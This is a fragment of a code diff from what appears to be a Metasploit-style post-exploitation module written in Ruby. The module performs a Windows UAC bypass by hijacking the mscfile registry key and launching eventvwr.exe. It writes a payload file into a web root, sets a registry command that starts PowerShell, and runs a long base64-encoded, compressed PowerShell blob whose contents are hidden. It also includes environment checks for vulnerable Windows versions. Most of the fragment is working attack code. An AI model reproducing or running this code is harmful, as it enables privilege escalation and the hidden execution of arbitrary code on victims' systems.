File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
|
||||||
|
end
|
||||||
|
file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command)
|
||||||
|
end
|
||||||
|
|
||||||
|
result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ')
|
||||||
|
if result
|
||||||
|
execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=")
|
||||||
|
print_good('Created registry entries to hijack!')
|
||||||
|
end
|
||||||
|
|
||||||
|
r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true})
|
||||||
|
check_permissions!
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def validate_environment!
|
||||||
|
fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
|
||||||
|
winver = sysinfo['OS']
|
||||||
|
|
||||||
|
unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
|
||||||
|
fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
||||||
|
end
|
||||||
|
|
||||||
|
if is_uac_enabled?
|
||||||
|
print_status 'UAC is Enabled, checking level...'
|
||||||
|
else
|
||||||
|
if is_in_admin_group?
|
||||||
|
fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
|
||||||
|
else
|
||||||
|
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
Loading…
Add table
Reference in a new issue